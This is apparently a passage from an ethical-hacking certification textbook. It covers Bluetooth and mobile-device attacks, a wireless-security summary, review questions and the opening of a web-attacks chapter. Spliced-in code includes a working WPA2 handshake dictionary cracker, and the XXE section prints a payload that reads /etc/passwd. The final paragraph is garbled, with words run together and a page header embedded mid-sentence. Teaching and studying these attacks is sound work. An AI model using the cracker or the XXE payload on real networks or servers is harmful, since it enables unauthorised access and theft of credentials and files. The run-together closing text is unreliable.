Bluetooth offers a number of capabilities, described by profiles. Each Bluetooth device will implement a set of profiles, depending on the requirements for the device. For example, a Bluetooth headset would implement the Advanced Audio Distribution Profile (A2DP). This profile defines how multimedia audio may be streamed from one device to another. This is not the only profile a headset would implement, so each Bluetooth device may implement several profiles. When two devices connect, they discover each other's capabilities through the Service Discovery Protocol (SDP), meaning they tell each other what profiles they support.

The pairing process leads to a bond between two devices. Pairing requires verification, so each device should provide a means of indicating it expects to and wants to pair with the other device. Early devices used a simple PIN, typically four digits, which needed to be provided to indicate that the device requesting to pair knew the value. Devices that had limited input capabilities, like a headset or earpiece, would have a value hard-coded. You would be provided with the correct value as part of the documentation for the device. Later versions of Bluetooth expanded the capabilities available to verify pairing requests. With Bluetooth v2.1, Secure Simple Pairing (SSP) was introduced. There were four
mechanisms to complete a pairing request with this version, outside of the compatibility required to support older devices. The first was called Just Works because the pairing was supposed to just work without any interaction on the part of the user. Just Works still produces an encrypted link, but nothing is verified, so it offers no protection against a device in the middle of the pairing. If both ends can display a value and accept a yes or no, they can support numeric comparison. This is where each end presents a six-digit numeric value. If the two values match, the user can indicate that to be the case and the two endpoints can complete the pairing process. In some cases, a peripheral may only be able to provide input but not output, such as, for example, a Bluetooth keyboard. When you pair that with your computer, your computer may display a value and prompt you to enter it on the keyboard. If the values match, the pairing process completes. Again, this would be a six-digit value; this mechanism is called passkey entry. Finally, you can do an out-of-band pairing. This would require another protocol to assist in the pairing process. For example, near-field communication (NFC) is sometimes used. You may have a device that expects you to bring another device like a smartphone or tablet close. Once the two devices are close, you can use an app on the smartphone or tablet to complete the pairing and setup process.

There are a few ways to attack Bluetooth. Keep in mind that no matter what you do, you need to be within close proximity of the device you want to attack. This can be easy in public places, though. Some of these attacks are bluejacking, bluesnarfing, and bluebugging.

Scanning

Before we go too far down the road of attacks, we should go over how you would determine where potential victims may be. You could just go through the process of adding a Bluetooth device, and your system will scan for devices. However, you can also make use of special-purpose software. This could be done using a program like btscanner. With btscanner, you can do both an inquiry scan and a brute-force scan. An inquiry scan is the normal discovery process: your adapter transmits inquiry packets, and any device that is in discoverable mode (in Bluetooth terms, in the inquiry scan state, listening for inquiries) answers with its address and device class. Inquiry uses 32 of the 79 Bluetooth channels, and your adapter has to hop across every one of them, so a complete scan takes several seconds. In the following listing, you can see btscanner performing an inquiry scan.

Inquiry Scan Using btscanner

Time                 Address            Clk off  Class     Name
2018/12/25 17:58:22  64:1C:B0:94:BA:58  0x2c42   0x0c043c  (unknown)
2018/12/25 17:56:07  00:9E:C8:93:48:C9  0x38b3   0x0a0110  (unknown)

enter=select, Q=quit
starting inquiry scan
Found device 00:9E:C8:93:48:C9
Found device 64:1C:B0:94:BA:58

The other type of scan is a brute-force scan. Whereas an inquiry scan waits for discoverable devices to answer, a brute-force scan pages addresses directly, one at a time, to determine what is there. A device that is not discoverable still answers a page addressed to it, which is why this finds devices an inquiry scan misses. To do this, it needs addresses to send messages to. This type of connection happens at layer 2, which means we are talking about MAC addresses; Bluetooth device addresses have the same 48-bit format, with the first three octets identifying the manufacturer. In the following listing, you can see the use of btscanner to perform a brute-force scan. To run this scan, you need to tell btscanner the starting address and the ending address you want to scan, which you can see being asked for. You would need to provide this in the form of a MAC address. Keep in mind that each octet has 256 values, so the more octets of the address you vary, the longer your scan will take: varying only the last octet means 256 pages, while varying the last three means more than 16 million.

btscanner Starting a Brute-Force Scan

[btscanner dialog prompting for the Start address of the range to page]
btscanner 2.0
keys: h = help, i = inquiry scan, b = brute force scan, a = abort scan, s = save summary, o = select sort, enter = select, Q = quit

This type of scanning will get you lists of devices. It won't tell you the profiles that the devices support; for that you query a device's service records (for example, with sdptool browse from BlueZ). Just having the list of devices nearby may be enough to run some of the attacks commonly used against Bluetooth devices.

Bluejacking

Bluejacking is when an attacker sends data to a Bluetooth device without having to get through the pairing process, or perhaps the pairing happens without the receiver knowing about it. You could use a bluejacking attack to send an unsolicited message to a victim. This might be a picture or a text message. This could be a spoof attack, where you send a message that appears to be from someone else in order to get the recipient to do something. This attack uses the Object Exchange (OBEX) protocol to push the message or picture from one device to another. Since this is just a one-way message, alone it isn't harmful. The harm from this sort of attack comes from getting the device owner to do something you want them to do, which may not be beneficial for them.

Bluesnarfing

Bluesnarfing is considerably more dangerous than bluejacking. Whereas bluejacking is sending data to a device, bluesnarfing is getting data from a device. Bluetooth devices have to be exposed to a certain degree to allow other devices to begin a pairing process. This opens up the possibility of another device taking advantage of that little window. It has been possible to gain access to a device over Bluetooth without having gone through the pairing process: the original bluesnarfing attacks used the same OBEX push channel that bluejacking relies on, but issued requests for objects such as the phonebook and calendar, which early phones served without any authentication. If an attacker can gain access to someone's smartphone or another Bluetooth-enabled device with sensitive data on it, they may be able to extract that data. As with other Bluetooth attacks, the attacker has to be within close proximity of the device they want to gain access to. There is a variation, however, called long-distance bluesnarfing, which uses a directional antenna to allow the same sort of attack from a much greater distance.

Bluebugging

It's likely you're aware of the concern of listening devices around us. Amazon's Echo, Google's Home, and other, similar devices are generally in a "listen all the time" mode. A bluebugging attack is something similar and was available long before we started willingly installing these other devices into our living and working spaces. A bluebugging attack uses Bluetooth to gain access to a phone in order to place a phone call. The phones affected exposed an AT command channel, the same serial-style interface used by headsets and modems, without requiring authentication, so an attacker could issue the command to dial a number. Once the phone call is placed, the attacker has a remote listening device. The initial attack has to be done in close proximity to the target, but the phone call will continue to provide a remote listening point no matter where the victim and attacker are in relationship to one another. Bluebugging is, perhaps fortunately or unfortunately depending on which end you are on, easily identified and defeated. At least when the phone call is placed, it's obvious to the person who has the device. All they have to do is look at their device. They can then hang up. Of course, remediating the vulnerability that gave access to the attacker to begin with is a different story.

Bluebugging attacks, as well as the others, are old. This means they are less likely to be successful against modern devices, since vulnerabilities that can allow attackers easy access have generally been remediated in the intervening years since these attacks were identified. This is not to say they are irrelevant, however. There are still older devices in use that may allow these attacks to be successful.

Mobile Devices

Bluetooth attacks are one way to gain access to mobile devices, and Bluetooth is nice because you don't need to have physical access; you just need to be proximal to the victim. This allows you to work through the air rather than doing something physically. Given the
ubiquitous nature of mobile devices, it would make sense that they would be high-value targets for attackers. While many attacks rely on specific vulnerabilities in applications and operating systems, there are some attacks that are common across mobile platforms. Because they work across multiple platforms, they are more classes of attacks than specific exploits.

There are currently two predominant platforms for mobile devices, though that doesn't mean there are only two platforms. It's also made more complicated because one of the platforms is Android. Android is software developed and managed by Google, but the hardware that runs Android is developed by numerous manufacturers. Google provides the source code for Android to vendors, and each vendor may implement it in different ways, altering the code and/or adding software and features. This means the Android platform is splintered and fragmented, not to mention the large number of Android versions that are in the wild. Android runs on smartphones and tablets. There is also a version of Android that runs on smart wearables like watches.

The other platform that is common is iOS, developed by Apple for the iPhone and iPad. iOS shares its kernel and many of its frameworks with macOS. The advantage of iOS from our perspective here is that Apple does a lot to drive users to the latest software versions: updates ship directly from Apple to every supported device rather than through carriers or handset makers, and older hardware is dropped from support. This means there are far fewer versions of iOS in the wild than there are of Android. There are two sides to this coin. There is a better chance that iPhone/iPad installs are closer to being up-to-date, with fewer known vulnerabilities than Android installations are subject to.

One of the most disturbing vectors for threats to mobile devices is through applications. Android comes with an application marketplace called the Google Play Store. Vendors like Samsung may also have their own application marketplaces as another option for applications to be installed on a mobile device. There are also third-party app stores that can be configured on devices. Allowing this is a setting on the Android platform. By default, it's generally disallowed, but users can bypass that protection if they wish. Apple has its own marketplace. You can see the Apple App Store in Figure 11.10. iOS is not an open platform like Android. There is no way to configure additional marketplaces or install applications without breaking the operating system's restrictions. This process, commonly called jailbreaking, has become nontrivial as Apple (and, for the equivalent rooting of Android devices, Google and Samsung) has found ways to fix the vulnerabilities that allowed it to happen. Users who may be inclined to jailbreak a phone may also be likely to install illegitimate software.

FIGURE 11.10 Apple App Store

Mobile Device Attacks

Third-party applications are the best way to get access to mobile devices. Both Google and Apple vet applications that are submitted to their app marketplaces. This is not a perfect process, however. There have been applications that have made it through this vetting process in both marketplaces that are malicious in one form or another. Sometimes legitimate software even crosses lines, such as when Trend Micro software was pulled because of the data it was found to be collecting. The problem is even worse with application marketplaces that don't vet software (that is, run the software through tests and analysis). Getting software into a third-party marketplace is a way to insert spyware and other malware onto mobile devices.

Many apps regularly collect data, either with the user's awareness or without. This data can be transmitted back to storage controlled by the app's owner. Most applications use frameworks provided by the operating system vendor (e.g., Apple or Google). These frameworks are commonly used to send data over an HTTP connection, and the platforms now default to requiring encryption of that connection (App Transport Security on iOS, and the cleartext-traffic restriction on Android 9 and later). Developers can opt out of those defaults, though, so there is no guarantee of encryption, which means data can be leaked if the application collects data from the user and then sends that data to a remote storage location. This data leakage is potentially a serious problem, and it might also be used by an attacker to gather details that could be used for other attacks.

As mentioned, wireless networks aren't always protected. There may be rogue networks or unencrypted networks. This is another place where data leakage can happen. Using techniques shown earlier in this chapter, data can be collected over wireless networks. This may be especially useful in public places, where people are likely to be attached to wireless networks from their mobile devices. They may also be likely to be doing things like checking enterprise email or interacting over enterprise communications platforms like Microsoft Teams, Slack, or HipChat.

Some other common attacks against mobile devices are the same as those you would think about for traditional desktop systems. A mobile device may have a different processor, and the operating systems do provide some protections for applications so they don't interact with other applications on the device. This is a technique called sandboxing. Phishing attacks are just as possible on mobile devices. Malware is possible on mobile devices, just as it is on desktop systems. Malware can include spyware, collecting information from the mobile device.

Bad programming is always an issue. No matter how much testing is performed, between the software vendor and the platform vendor, bugs happen. In some cases, bad encryption mechanisms may be used. This may happen when programmers think there are better ways to encrypt than by standard means. It's commonly felt that openly available encryption is best because it gets analyzed and tested by a lot of people who are the best in their fields. Another possibility from bad programming practices is improperly handling session data. Session data is used to provide information about the state of the application communications. It lets the client and server know where they are in the application flow. If session information isn't handled properly, sessions can be impersonated. They may also be replayed. This may be especially possible in combination with weak encryption.

As more users bring their own devices into the workplace, it can be harder to protect the enterprise because not every avenue of attack can be closed down on a personal device. The company needs to protect its assets, but the smartphone isn't a company asset. There is an interesting intersection here, which attackers can take advantage of.

You don't have to go really fancy with your mobile device attacks, though. You can go old-school. Smishing attacks, short for Short Message Service (SMS) phishing, use text messages to attack users. Figure 11.11 shows an example of a real-life smishing message. Attackers are returning to these old-school attacks. You can see some of the hallmarks of this being an attack message. Sometimes, you will see the mixed-case scheme hTtP used because it's thought to be a way of evading detection. This message doesn't have that indicator. Old intrusion detection systems didn't take mixed-case indicators into account and would miss malicious messages that weren't exactly as you'd expect (either HTTP or http, for instance). This message relies on a scare tactic, though, which is an indicator that it is malicious. Especially with so much news about vulnerabilities, this could be the type of message that would lure in someone who wasn't very sophisticated technically. The domain name here is highly suspicious, though sometimes you will see URLs that are even more suspicious. Sometimes, the URL will include a raw IP address. A smishing message received a few months ago included a URL with a raw IP address. The URL used 82.118.21.203 instead of a domain name or a fully qualified domain name. In case you are questioning, though, you can do a simple lookup of this IP address, or even of domain names in case you are concerned about them. In this case, the IP address maps to Russia. While this in and of itself isn't suspicious, it wouldn't be the source of a website that T-Mobile, the company the text message was purporting to come from, would use to get customers to visit from a text message. The following was the hostname lookup for this IP address at the time of the receipt of the text message. In the intervening months, during edits to the book, the hostname has changed. You can see the new name after the original name.

$ host 82.118.21.203
203.21.118.82.in-addr.arpa domain name pointer kamal2.bakkali59.pserver.ru.
$ host 82.118.21.203
203.21.118.82.in-addr.arpa domain name pointer nebrosika4.isplevel.pro.

FIGURE 11.11 Smishing message
Photo courtesy of Rick Read
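The indicators just described (a mixed-case scheme, a raw IP address in the link, a domain that doesn't belong to the brand the message claims, and urgency language) can be turned into a small triage script. The following is an added example, not code from the book: it runs over three constructed SMS messages, two of which are made up and one of which reuses the raw IP address discussed above. The brand-to-domain table and the list of urgency words are assumptions for the example; real triage would use a maintained list of the sender's legitimate domains and the Public Suffix List instead of the naive last-two-labels domain check.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample messages (not real captures). The raw IP address is the one
# discussed in the text; the other hosts are made up for the example.
SAMPLE_MESSAGES = [
    "T-Mobile: your account was compromised. Verify now at hTtP://82.118.21.203/secure",
    "T-Mobile: your bill is ready. View it at https://www.t-mobile.com/billing",
    "URGENT: unusual login detected. Confirm your identity at https://tmobile-verify.xyz/login",
]

# Hypothetical brand-to-domain table (assumption for the example).
BRAND_DOMAINS = {
    "t-mobile": {"t-mobile.com"},
    "tmobile": {"t-mobile.com"},
}

# Assumed list of scare/urgency phrases.
URGENCY_WORDS = ("urgent", "compromised", "suspended", "verify now", "immediately")

# Case-insensitive on purpose, so that hTtP:// is captured rather than skipped.
URL_RE = re.compile(r"""(?i)\b(?:https?)://[^\s<>"']+""")


def extract_urls(message):
    """Return every http(s) URL in the message, preserving its original case."""
    return [m.group(0) for m in URL_RE.finditer(message)]


def registrable_domain(host):
    """Naive registrable domain: the last two labels. Use the Public Suffix List in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def claimed_brands(message):
    """Brands the message claims to come from, found by name match in the text."""
    text = message.lower()
    return {brand for brand in BRAND_DOMAINS if brand in text}


def url_indicators(url, brands):
    """Indicators for one URL: mixed-case scheme, raw IP host, brand/domain mismatch."""
    indicators = []
    scheme = url.split("://", 1)[0]
    if scheme != scheme.lower():
        indicators.append("mixed-case scheme")
    host = urlsplit(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        indicators.append("raw IP address instead of a hostname")
        is_ip = True
    except ValueError:
        is_ip = False
    if brands:
        legit = set().union(*(BRAND_DOMAINS[b] for b in brands))
        if is_ip or registrable_domain(host) not in legit:
            indicators.append("link does not belong to the claimed brand")
    return indicators


def triage(message):
    """Score one SMS: per-URL indicators, urgency language, and an overall verdict."""
    brands = claimed_brands(message)
    urls = [{"url": u, "indicators": url_indicators(u, brands)} for u in extract_urls(message)]
    urgency = any(word in message.lower() for word in URGENCY_WORDS)
    if any(u["indicators"] for u in urls):
        verdict = "suspicious"
    elif urgency:
        verdict = "review"
    else:
        verdict = "likely benign"
    return {"urls": urls, "urgency": urgency, "verdict": verdict}


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print(triage(msg)["verdict"], "<-", msg)
```

Urgency language on its own only earns a "review" verdict; it is the combination with a link that doesn't belong to the claimed sender that makes a message "suspicious". The reverse lookup shown above is deliberately left out of the script so it runs offline; add it as a separate enrichment step if you want the PTR record alongside the verdict.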
Summary

Wireless networks are common today, especially as mobile devices become more ubiquitous. There are two common types of wireless networks. The first is an ad hoc network, where the stations organize themselves into the network. A station is an endpoint in a wireless network. If there is an access point that the stations connect to, it's an infrastructure network. When stations connect to an access point, they have to authenticate. There may be open authentication, which means anyone can join the network without needing to know a password. Modern wireless networks use WPA2 or WPA3 for encryption, and WPA networks use a four-stage handshake to authenticate the station and also derive the encryption key.

WEP was the first attempt at encrypting wireless communications. Unfortunately, its 24-bit initialization vector, the value meant to seed the encryption, was too short to avoid reuse, and certain values of it leaked bytes of the key, so collecting enough frames recovered the key. The second pass was meant as a stopgap, and that was WPA. Eventually, the final replacement for WEP came out, called WPA2. WPA and WPA2 support both Personal and Enterprise authentication. Personal authentication uses a pre-shared key. Enterprise authentication uses 802.1X and can support username and password authentication. WPA3 was introduced in 2018. It includes stronger encryption options as well as Simultaneous Authentication of Equals (SAE) in place of the pre-shared key handshake, which gives each session its own key and means a captured exchange can't be used for an offline dictionary attack on the password.

Wireless networks can be attacked. In networks that use WEP, the encryption key could be derived if enough frames were collected from the wireless network. Common sniffing applications like Wireshark can be used to sniff wireless networks. The wireless interface needs to be put into monitor mode to collect the radio headers. Wireshark may be capable of doing this on its own, depending on the network interface. You can also use the airmon-ng program from the aircrack-ng suite. You can also use aircrack-ng to try to crack the pre-shared key used for the network from a captured handshake. One way to capture that handshake is to use a deauthentication attack. This attack sends management frames to clients telling them they have been deauthenticated from the network. The attacking system spoofs the frames to appear as though they are coming from the access point. Simultaneously, the attacker may attempt to jam the access point so it doesn't receive and, more important, respond to the station. The attacker may continuously send these deauthentication frames to force the victim station to keep trying to authenticate against the network. Protected Management Frames (802.11w), optional in WPA2 and required in WPA3, authenticate deauthentication and disassociation frames so that spoofed ones are ignored.

Evil twin attacks are where the attacker establishes a network that appears to be a legitimate network with the same SSID. Stations would attempt to authenticate against the rogue access point. The rogue access point could then collect any authentication credentials, and once the station had passed those along, the evil twin would allow the connection, gathering traffic from the station once the station was connected. Another attack is the key reinstallation attack. Here the attacker replays a captured handshake message to force a station to reinstall a key it is already using, which resets the per-packet nonce. The station then encrypts with keystream it has already used, and that reuse lets the attacker decrypt traffic and, with some cipher modes, inject it.
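To make concrete what "crack the pre-shared key from a captured handshake" means, here is an added example that is not code from the book or from aircrack-ng. It implements the WPA2-Personal key derivation (PMK from the passphrase and SSID with PBKDF2-HMAC-SHA1, PTK from the PMK, both MAC addresses and both nonces with PRF-512, and the HMAC-SHA1 MIC over the EAPOL frame) and uses it to test candidate passphrases against a handshake. Because no real capture is available offline, the handshake is constructed in code from a known passphrase: the MAC addresses are borrowed from the airodump-ng listing earlier in the chapter, the nonces are fixed values, and the EAPOL body is a stand-in for message 2 with its MIC field zeroed. This is the derivation for the PSK AKM (00-0F-AC:2) with SHA-1; the SHA-256 AKMs use different functions, and WPA3's SAE is not subject to this offline attack at all.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11 PRF-512: expands the PMK into the 64-byte PTK (KCK | KEK | TK).
    The MACs and nonces are ordered min/max so both sides compute the same value."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame):
    """WPA2 PSK AKM (00-0F-AC:2): MIC = HMAC-SHA1(KCK, EAPOL frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def passphrase_matches(candidate, hs):
    """True if the candidate passphrase reproduces the MIC seen in the handshake."""
    pmk = pmk_from_passphrase(candidate, hs["ssid"])
    ptk = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    kck = ptk[:16]  # Key Confirmation Key: the first 128 bits of the PTK
    return hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"])


def crack_handshake(hs, wordlist):
    """Offline dictionary attack: returns the first passphrase that matches, else None."""
    for candidate in wordlist:
        if passphrase_matches(candidate, hs):
            return candidate
    return None


def constructed_handshake(passphrase, ssid="WubbleWiFi"):
    """Builds a synthetic WPA2 handshake for this example (not a real capture).
    AP and station MACs come from the airodump-ng listing in the chapter; the
    nonces are fixed; the EAPOL bytes stand in for message 2 with its MIC zeroed.
    A real capture supplies all of these from the EAPOL-Key frames in the pcap."""
    ap_mac = bytes.fromhex("18d6c77dee11")
    sta_mac = bytes.fromhex("641cb094ba57")
    anonce = hashlib.sha256(b"constructed ANonce").digest()
    snonce = hashlib.sha256(b"constructed SNonce").digest()
    eapol = (b"\x01\x03\x00\x75\x02\x01\x0a\x00\x10" + b"\x00" * 8 + snonce
             + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")
    hs = {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
          "anonce": anonce, "snonce": snonce, "eapol": eapol}
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    hs["mic"] = eapol_mic(ptk[:16], eapol)
    return hs


if __name__ == "__main__":
    hs = constructed_handshake("wubble-guest-2021")
    print(crack_handshake(hs, ["password", "letmein123", "wubble-guest-2021"]))
```

Each candidate costs 4096 HMAC-SHA1 iterations, which is why the attack is a dictionary attack rather than a brute force: the PBKDF2 work factor is what makes a long, random passphrase safe even after the handshake has been captured, and it is also why tools such as aircrack-ng and hashcat spend their effort on wordlists and GPU acceleration.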
Of course, 802.11 is not the only wireless communications protocol. Bluetooth is often used. There are several Bluetooth attacks, though some of them may be outdated and won't work on modern devices. But there are plenty of legacy devices that use older Bluetooth implementations where these attacks can work. Bluejacking is using Bluetooth to send a message to a target system. Bluesnarfing is collecting data from a target system using Bluetooth. Bluebugging is using Bluetooth to connect to a target system and then initiating a call out from the target system so conversations can be bugged.

Mobile devices commonly use wireless protocols like 802.11 and Bluetooth. There are ways to inject malicious applications onto mobile devices like tablets and smartphones. This may be done using a third-party app store that users may be convinced to add as an option to their device. Mobile devices are also vulnerable to the same sorts of attacks as desktops, such as phishing, malware, and programming errors that can open the door for data leakage.

Review Questions

You can find the answers in the appendix.

1. What are the two types of wireless networks?
A. Star and ring
B. Bus and hybrid
C. Infrastructure and hybrid
D. Infrastructure and ad hoc

2. How many stages are used in the WPA handshake?
A. Two
B. Four
C. Three
D. One

3. What mode has to be enabled on a network interface to allow all headers in wireless traffic to be captured?
A. Promiscuous
B. Monitor
C. Radio
D. Wireless LAN

4. What wireless attack would you use to take a known piece of information to be able to decrypt wireless traffic?
A. Sniffing
B. Deauthentication
C. Key reinstallation
D. Evil twin

5. What is the purpose of performing a Bluetooth scan?
A. Identifying open ports
B. Identifying available profiles
C. Identifying endpoints
D. Identifying vendors

6. What is the purpose of a deauthentication attack?
A. Disabling stations
B. Forcing stations to reauthenticate
C. Reducing the number of steps in the handshake
D. Downgrading encryption
7. What is the policy that allows people to use their own smartphones on the enterprise network?
A. Bring your own device
B. Use your own device
C. Bring your own smart device
D. Use your own smart device

8. What part of the encryption process was weak in WEP?
A. Keying
B. Diffie-Hellman
C. Initialization vector
D. Seeding vector

9. What is the four-stage handshake used for?
A. Passing keys
B. Deriving keys
C. Encrypting messages
D. Initialization seeding

10. What is the SSID used for?
A. Encrypting messages
B. Providing a MAC address
C. Identifying a network
D. Seeding a key

11. What kind of access point is being used in an evil twin attack?
A. Infrastructure
B. Ad hoc
C. WPA
D. Rogue

12. How does an evil twin attack work?
A. Phishing users for credentials
B. Spoofing an SSID
C. Changing an SSID
D. Injecting four-way handshakes

13. What method might you use to successfully get malware onto a mobile device?
A. Using the Apple Store or Google Play store
B. Using external storage on an Android
C. Using a third-party app store
D. Jailbreaking

14. What would you use a bluebugging attack for?
A. Identifying Bluetooth devices nearby
B. Listening to a physical space
C. Enabling a phone's camera
D. Gathering data from a target system

15. What would a signal range for a Bluetooth device commonly be?
A. 300 ft.
B. 3,000 ft.
C. 75 ft.
D. 500 ft.

16. What tool could you use to enable sniffing on your wireless network to acquire all headers?
A. Ettercap
B. tcpdump
C. aircrack-ng
D. airmon-ng

17. Why is bluesnarfing potentially more dangerous than bluejacking from the standpoint of the victim?
A. Bluejacking sends while bluesnarfing receives.
B. Bluejacking receives while bluesnarfing sends.
C. Bluejacking installs keyloggers.
D. Bluesnarfing installs keyloggers.

18. What tool would allow you to run an evil twin attack?
A. Wireshark
B. Ettercap
C. wifiphisher
D. aircrack-ng

19. What types of authentication are allowed in a WPA-encrypted network?
A. Handshake and personal
B. Personal and enterprise
C. Enterprise and handshake
D. 802.11 and personal

20. What wouldn't you see when you capture wireless traffic that includes radio headers?
A. Capabilities
B. Probe requests
C. SSIDs
D. Network type

Chapter 12 Attack and Defense

THE FOLLOWING CEH TOPICS ARE COVERED IN THIS CHAPTER:
✓ Firewalls
✓ Network security
✓ Boundary protection appliances
✓ Log analysis tools
✓ Security models
✓ Information security incidents
✓ Technical assessment methods

Attacking is an important element of an ethical hacking engagement. Once you've gotten through all of your evaluation of the environment, you can move into trying to gain access to it. While social engineering can be an important element in an attack, it's not the only way in. Once you get inside, you will also want to work on moving laterally. This can require some technical attacks. It may involve engaging with web applications and the different vulnerabilities that may be exposed there. You may also need to know about denial-of-service attacks. It may be necessary to take out a server while you are performing spoofing attacks. There are also application-level compromises of listening services.

Another element to consider while you are attacking a network is what defenses are in place. Since the primary objective of ethical hacking is to improve the defensive posture of an organization, it's helpful to understand defensive strategies. On the attack side, knowing what may be in place will help you circumvent the defenses. When you are providing remediations to the organization you are working with, you should have a better understanding of what might be done.

Web applications are a common way for users to get access to functions and data from businesses. There are several ways to attack web applications. Attacking a web application successfully may have multiple potential outcomes, including getting system-level access. Websites are also sometimes targets of denial-of-service attacks. While bandwidth consumption attacks may come to mind when you think of denial of service, that's not the only type of denial-of-service attack. There are some ways to perform denial-of-service attacks that remain effective and have nothing to do with bandwidth consumption.

Attackers will usually try to move from system to system, a process we call lateral movement. Because of this, and because an easy avenue is often through already open holes, it's important to have a good defensive strategy. While defense in depth and defense in breadth have long been thought to be good approaches to protecting the network, another way to think about the network design is implementing a defensible network architecture.

Web Application Attacks

Web applications are more than just a set of web pages. It's possible to have a static site where users have no programmatic interaction with the pages. Pages are presented to the user and there may be links and other content, but there is no place to enter anything into the page or otherwise send something to the server that may be acted on. A web application may have code within the page, using a scripting language, or code that runs on the server.

One way to think about a web application is from the architecture standpoint. A common way to develop an application is through the use of the model/view/controller pattern. Figure 12.1 shows a diagram of how the model/view/controller pattern would be implemented through a web application. The model is the structure of the data. While it is often stored in a database, there is often an application server that manages the model by creating the structure and acting on it. The application server uses the database server for persistent storage, but all handling of the data (the model) is done in the application server. This means all data manipulation is initiated in the application server, though execution of the logic may sometimes happen on the database server. Keep in mind that interaction with a database is done through the use of Structured Query Language (SQL). While the business and application logic happens in the application server, sometimes the manipulation is actually done on the database server.

FIGURE 12.1 Model/view/controller design
[Diagram: the View (browser) talks to the Web Server; the Controller and the Model run in the Application Server, which uses the Database for persistent storage.]

The controller is the part of the application that receives requests and handles them, vectoring the request to the correct part of the application running in the application server. Finally, the view is the user interaction component, generally a web browser. The model is presented in a way that is consumable by a user in the browser. There is code in the form of Hypertext Markup Language (HTML) used to describe and render the pages. There may also be scripts that help with the function of the page in the browser.

The application server handles the business logic of the application and may use different programming languages, depending on the type of application server. On Windows, someone may be using Microsoft's Internet Information Services, which would have an application server supporting .NET languages like C# and Visual Basic. Java application servers are available from many vendors. Tomcat, WildFly (formerly JBoss), WebLogic, and many others are types of Java application servers. The application server itself may introduce different vulnerabilities and methods of attack, but there are also many generic attacks common across web applications. One important consideration when you are looking at web application attacks, however, is which component is being attacked. Some attacks may be aimed at the client device (the view), while others may be targeting the web server (the controller). Others may be after the data storage element (the database). The point of attack, though, is not always where you would remediate the attack. This means that even if, for example, the client was the target of an attack, the client may not be the best place to protect against the attack happening.

XML External Entity Processing

A data model may be a complex set of data where multiple pieces of data are related and need to be organized together. This is very different from just passing a string from a web page to a web server. It may be passing multiple strings, a few integers, and also some organizing information. One way of organizing the data is to use the Extensible Markup Language (XML). XML allows you to put all related data together into a single data structure, complete with the organizing information indicating what each piece is. A common way to pass data back and forth between a client and a server is to use XML to structure the data and transmit that XML.

As you will see with other web application attack types, an XML external entity (XXE) attack comes from code on the web server accepting data from the client without any validation and handing it to an XML parser that is allowed to process document type definitions and resolve external entities. Programmers have not written any sort of check on the data when it enters the application. Even if it's script code in the page contents that is rendering the data, it's still possible for a user to tamper with it or even generate a data transmission to send to the server. As a result, any data coming from the user should never be trusted. As a general rule, data passed into a function from the outside should not be trusted because there is no guarantee the normal control flow of the program hasn't been tampered with. When programmers don't do any checking of the data, bad data can slip into the program and alter the expected behavior. For XXE specifically, the reliable fix is in the parser configuration rather than in input validation: disable DTD processing, or at least external entity resolution, in any parser that handles untrusted XML.

An example of an XML document that could allow the attacker to gain access to system files is shown in the following code listing. The document's DOCTYPE declares an external entity that refers to something on the system. In this case, it's a file. The attacker is requesting that the contents of the file /etc/passwd be delivered back to the view wherever the entity is referenced.

XML External Entity Processing Example

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<!-- the root element name is illustrative; the entity declaration and the &xxe; reference are the point -->
<data>&xxe;</data>

This may not necessarily seem like a big deal. However, in some cases, you can get the application server to do some of your work for you. Let's say you want to know
whetheraninternalwebserver(e.g.,oneyou,astheattacker,can’taccessbecauseoffirewallrules)isrunning.OnewayofdoingthisistohavetheapplicationserverinitiatearequestbypassingaURLintothesystemtag.ThiswouldhavetheapplicationservermakeacalltothesystemwithaURL,whichthesystemwouldinterpretasarequesttopullthepageindicated.HereyoucanseeanexampleofXMLthatwouldallowthistohappen.WebApplicationAttacks 483XMLRequestfor 